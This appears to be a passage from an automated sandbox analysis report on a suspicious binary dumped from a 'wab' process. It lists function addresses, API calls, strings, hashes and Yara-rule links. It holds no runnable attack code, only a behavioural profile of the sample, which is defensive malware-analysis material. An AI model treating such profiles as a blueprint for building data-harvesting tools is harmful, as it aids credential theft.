                                                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                • memcpy.MSVCRT ref: 00405498
                                                                                                                • memcpy.MSVCRT ref: 004054AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                • String ID: 6$\
                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                • String ID: advapi32.dll
                                                                                                                • API String ID: 2012295524-4050573280
                                                                                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2350177629-0
                                                                                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 265355444-0
                                                                                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1973883786-0
                                                                                                                • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004185FC
                                                                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@AttributesFilememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 776155459-0
                                                                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2308052813-0
                                                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PathTemp$??3@
                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                • API String ID: 1589464350-1420421710
                                                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0041477F
                                                                                                                • wcscpy.MSVCRT ref: 0041479A
                                                                                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                • String ID: General
                                                                                                                • API String ID: 999786162-26480598
                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                • API String ID: 0-1953309616
                                                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                • API String ID: 3510742995-272990098
